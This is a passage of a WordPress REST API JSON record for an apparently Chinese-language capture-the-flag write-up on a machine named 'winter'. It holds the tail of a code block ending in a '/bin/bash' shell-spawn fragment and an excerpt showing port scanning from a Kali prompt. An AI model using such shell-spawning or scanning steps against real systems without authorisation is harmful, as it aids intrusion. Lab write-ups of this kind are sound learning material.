\/bin\/bash&#039;)<\/code><\/pre>\n<p>\u6682\u4e14\u6401\u7f6e\uff0c\u56de\u5934\u6709\u601d\u8def\u518d\u52a0\u5427\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>winter \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter] \u2514\u2500$ rus [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-787","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=787"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/787\/revisions"}],"predecessor-version":[{"id":788,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/787\/revisions\/788"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=787"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}